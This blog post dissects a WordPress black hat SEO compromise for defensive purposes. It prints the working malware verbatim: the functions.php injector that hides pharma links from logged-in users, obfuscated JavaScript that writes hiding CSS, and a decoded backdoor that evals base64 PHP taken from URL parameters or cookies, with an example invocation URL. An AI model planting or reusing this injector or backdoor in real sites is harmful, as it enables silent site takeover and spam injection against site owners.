Graham King

Solvitas perambulum

WordPress Black Hat SEO dissected

Summary
A friend noticed hidden pharma links on her GoDaddy-hosted WordPress site, which led to the discovery of a sophisticated black hat SEO hack. The CSS that hid the links was written into the page by obfuscated JavaScript, presumably so that search engines would not notice the links were invisible. The injecting code, appended to the `functions.php` of every theme, pulled reversed data from the WordPress database and inserted it into the site's HTML. Additional PHP files let attackers execute base64-encoded commands passed in URL parameters or cookies. How the attackers got in remains unclear, but moving the site off shared hosting to a private server resolved it. The hack aimed to boost search rankings for pharma sites, showing the lengths some will go to for search engine optimization.

Last weekend a friend asked me why there were pharma links hidden in her GoDaddy-hosted WordPress site, and that led me down the WordPress black hat SEO rabbit hole.

Front end

This is what we were seeing:

[Screenshot: pharma links]

From a browser the site looked fine. The links had been there undetected for five months! The HTML is being hidden by this CSS:

<style type="text/css">.blogcycle_p{position:absolute;clip:rect(438px,auto,auto,438px);}</style>

But that CSS doesn’t appear anywhere in the page source. It’s being written out by this obfuscated JavaScript:

var _gw7 = [];
_gw7.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']);
_gw7.push(['_setOption', '6918518510413211616817818117316919116917817116518219318']);
_gw7.push(['_trackPageview', '2181185175186175181180128167168185181178187186171129169']);
_gw7.push(['_setOption', '1781751821281841711691861101221211261821901141671871861']);
_gw7.push(['_trackPageview', '8111416718718618111412212112618219011112919513011718518']);
_gw7.push(['_setOption', '6191178171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Presumably this is being done so that Google doesn’t notice that the links are not visible. The number in the _gw7 variable name varies – maybe it’s random or maybe a version number. You can find many other victims by searching for 13018518….
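To see what the script writes without loading it in a browser, the loop can be replayed by hand. Here is a minimal sketch in plain JavaScript (I'm assuming Node.js; the name decodeChunks is mine, not the attacker's). It joins the digit strings, reads them three digits at a time, subtracts 70 and converts each result to a character, exactly as the loop above does, but returns the string instead of handing it to document.write.

```javascript
// Digit strings copied from the _gw7.push(...) calls above.
const chunks = [
  '1301851861911781711021861911821711311041861711901861171',
  '6918518510413211616817818117316919116917817116518219318',
  '2181185175186175181180128167168185181178187186171129169',
  '1781751821281841711691861101221211261821901141671871861',
  '8111416718718618111412212112618219011112919513011718518',
  '6191178171132',
];

// decodeChunks is a hypothetical helper name. The offset of 70 and the
// three-digit width come straight from the obfuscated loop.
function decodeChunks(parts, offset = 70) {
  const digits = parts.join('');
  let out = '';
  for (let pos = 0; pos + 3 <= digits.length; pos += 3) {
    const code = parseInt(digits.slice(pos, pos + 3), 10) - offset;
    out += String.fromCharCode(code);
  }
  return out;
}

const decoded = decodeChunks(chunks);
console.log(decoded);
```

The result is the style tag shown earlier. Note that the digit groups straddle the array entries, so the strings have to be joined before they are sliced.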

Back end – display

The big question then became: How the hell is this getting onto the page?

The answer is that the PHP has been edited. The functions.php in every single theme had this appended to the bottom (the important part is at the far right of the long if line):

if (!function_exists("b_call")) {
function b_call() {
if (!ob_get_level()) ob_start("b_goes");
}
function b_goes($p) {
if (!defined('wp_m1')) {
    if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) || (!$m = get_option('_iconfeed1'))) {
        return $p;
    }
    list($m, $n) = @unserialize(trim(strrev($m)));
    define('wp_m1', $m);
    define('wp_n1', $n);
}
if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
return $p;
}
function b_end() {
@ob_end_flush();
}
if (ob_get_level()) ob_end_clean();
add_action("init", "b_call");
add_action("wp_head", "b_call");
add_action("get_sidebar", "b_call");
add_action("wp_footer", "b_call");
add_action("shutdown", "b_end");
}

My knowledge of WordPress is basic, so the first few times I looked at this it seemed fine. It was only thanks to an analysis by NinjaFirewall that I went and looked again. The get_option('_iconfeed1') call reads a value from the database; the code then reverses it, unserializes it, and injects the result into the page. The name of the option changes; presumably it’s picked from a list at infection time. There’s a nice touch here where the injection is skipped for logged-in users, which probably complicates investigation (“My site looks fine, your computer must have a virus or something!”).
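Since the block looks harmless at a glance, it may help to check theme files mechanically. This is a rough sketch, in JavaScript for Node.js, of a scanner that flags PHP source containing the tell-tale constructs from the block above. The helper name scanThemeSource and the list of patterns are my own assumptions based on this one infection; other variants will likely need different patterns, and a clean result proves nothing.

```javascript
// Patterns taken from the injected block quoted above. They are assumptions
// about this one infection; other variants may use different names.
const indicators = [
  {
    name: 'output buffer with named callback',
    pattern: /ob_start\s*\(\s*["'][A-Za-z_]\w*["']\s*\)/,
  },
  {
    name: 'unserialize of a reversed string',
    pattern: /unserialize\s*\([^;]*strrev\s*\(/,
  },
  {
    name: 'WordPress login cookie check',
    pattern: /\$_COOKIE\s*\[\s*["']wordpress_test_cookie["']\s*\]/,
  },
];

// scanThemeSource is a hypothetical helper: it returns the names of the
// indicators found in the given PHP source text.
function scanThemeSource(source) {
  return indicators
    .filter((indicator) => indicator.pattern.test(source))
    .map((indicator) => indicator.name);
}

// Three lines modelled on the injected code, joined into one sample file.
const infected = [
  'if (!ob_get_level()) ob_start("b_goes");',
  "if (isset($_COOKIE['wordpress_test_cookie'])) return $p;",
  'list($m, $n) = @unserialize(trim(strrev($m)));',
].join('\n');

console.log(scanThemeSource(infected));
```

Any one of these can appear in legitimate code; it is the combination in a single functions.php that deserves a closer look. In practice you would read each theme's functions.php from disk and pass its contents to the function.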

In the wp_options database table, the _iconfeed1 option holds the JavaScript and the HTML string with all the pharma links, reversed. Why is it reversed? I’m not sure. Maybe it defeats some WordPress plugins that look for this type of thing. It certainly defeated my initial grep of the database dump.
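A plain search misses reversed text, so the obvious countermeasure is to search for the reversed needle as well. Below is a small sketch in JavaScript (Node.js assumed). The helper names and the sample rows are made up for illustration; a real check would load name and value pairs from the wp_options table or from a dump.

```javascript
// Reverse a string by code point.
function reverse(text) {
  return Array.from(text).reverse().join('');
}

// findOptions is a hypothetical helper: it returns the names of rows whose
// value contains the needle either as written or reversed.
function findOptions(rows, needle) {
  const backwards = reverse(needle);
  return rows
    .filter((row) => row.value.includes(needle) || row.value.includes(backwards))
    .map((row) => row.name);
}

// Made-up rows for illustration only. The second value imitates a reversed
// PHP-serialized pair; it is not the real payload.
const rows = [
  { name: 'blogname', value: 'My Shop' },
  {
    name: '_iconfeed1',
    value: reverse('a:2:{i:0;s:7:"_gw7.pu";i:1;s:5:"<div>";}'),
  },
];

console.log(findOptions(rows, '_gw7')); // logs the one matching option name
```

With grep the same idea works by reversing the search term first, for example looking for 7wg_ instead of _gw7.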

Back end – input

But wait, it’s about to get so much better, because the next question is: how the hell did they write to wp_options? An svn diff of the WordPress install against the repo reveals these new files:

  • wp-content/<theme>/entry-nav.php # In several, but not all, themes
  • wp-content/<theme>/sidebar-meta.php # Only in one theme
  • wp-admin/ms-media.php
  • wp-admin/includes/class-wp-menu.php
  • wp-includes/theme-compat/archive.php
  • wp-includes/post-load.php

The names differ on other infected sites, but seem chosen to look like parts of WordPress. And what’s in those files? Oh, you’re in for a treat. Here are the first few lines of one:

$bawdy= 'T';
$concoct = 'e';$cretin= '2XRa)$r)';$eyers= ';$_';

$befogged= 'e'; $gayety ='a';$jolynn ='8'; $armour ='$0QP('; $hotdick ='K';$brief='a)Q$TM';$boxtop = 'e'; $grating='i'; $fuckyoufuckyou ='s';$claus='P';
$blitzes = '$[n>EO_';$cancels = 'N(gL';$fernanda= 'cV;E;r)6';$hasty =':i_e_';

$carla = '$(Wa'; $duplicable=',2aC(';
$dolli = 't'; $contributing='$';

They all follow the same pattern, with variable names clearly taken from a word list. Most of them didn’t seem to run; they were missing variables and a closing PHP tag. For analysis, here’s a full one (minus PHP tag) that did run, and that I’ve hacked around to display its output: obfuscated php (to understand it, look for ‘hello’).

It decodes to this:

$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["b02005f9ffdf8"])
    ? $i["b02005f9ffdf8"]:
(isset($i["HTTP_B02005F9FFDF8"])?$i["HTTP_B02005F9FFDF8"]:die
);
eval(base64_decode($a));

That takes base64 encoded PHP code from a request parameter (such as a URL parameter), a cookie, or, via the HTTP_ entry in $_SERVER, a custom request header of the same name, and runs it. The cookie part is nice, because it won’t show in the access logs. The hex string is a nice touch too: it changes for each infection, so other people will have a hard time taking advantage of the back door.

To run echo "<h1>Hello</h1>"; the attacker would hit something like:

http://example.com/wp-includes/post-load.php?b02005f9ffdf8=ZWNobyAiPGgxPkhlbGxvPC9oMT4iOw==
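If you do find a request like this in your logs, you can recover what was run by pulling out the parameter and base64-decoding it. A minimal sketch, assuming Node.js; decodeBackdoorRequest is a name I made up, and the parameter name is the hex string from this particular infection, so yours will differ.

```javascript
// decodeBackdoorRequest is a hypothetical helper: given a logged URL and the
// per-infection parameter name, it returns the PHP source that was sent, or
// null if the parameter is absent.
function decodeBackdoorRequest(loggedUrl, paramName) {
  const value = new URL(loggedUrl).searchParams.get(paramName);
  if (value === null) {
    return null;
  }
  return Buffer.from(value, 'base64').toString('utf8');
}

const exampleUrl =
  'http://example.com/wp-includes/post-load.php?b02005f9ffdf8=ZWNobyAiPGgxPkhlbGxvPC9oMT4iOw==';

const command = decodeBackdoorRequest(exampleUrl, 'b02005f9ffdf8');
console.log(command);
```

This only helps for payloads sent in the URL. Anything delivered in a cookie or request header does not normally appear in a standard access log.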

Who did it? How?

Who did it? In the Apache access logs the only hit I see on one of those injection scripts is from a hosting provider in Germany that does VPS and dedicated hosting. One single hit, and because the payload came in a cookie I don’t have the PHP that they ran. Around that time I see a ton of probing from an address in Israel, a little suspicious given that the site is a local Canadian business, but it’s certainly not conclusive. I have no idea who did it.

How? I’m not sure. There were only two accounts on that site, with what I’d consider good passwords. Like every WordPress site it was getting lots of brute force cracking attempts, but POSTing to the login page gets you about 2 attempts / second (my sites use BruteProtect to reduce this). My leading theory then is that the attackers got into a different site on the shared hosting, and just wrote into every other site on that machine (which are just different directories it seems).

How did I fix it? I moved my friend off GoDaddy’s shared hosting, to my own WordPress multisite on a Linode server.

The crazy part is that the sole purpose of the attack is to raise the page rank of some pharma links. I didn’t realise SEO was such big business that people would go to all this work.

I am also quite in admiration of the poor programmer who had to build this. Imagine trying to debug the CSS that was output by your reversed obfuscated JavaScript, which was written into the database by base64 encoding it and feeding it to an obfuscated PHP script! I tip my hat to you, Mr Black Hat SEO programmer.

Here are some other people who have the same problem but with different variables. And here’s what seems to be an earlier variant of this attack.

If you have any more information about this, please let me know in the comments, and I’ll update the post. Thanks!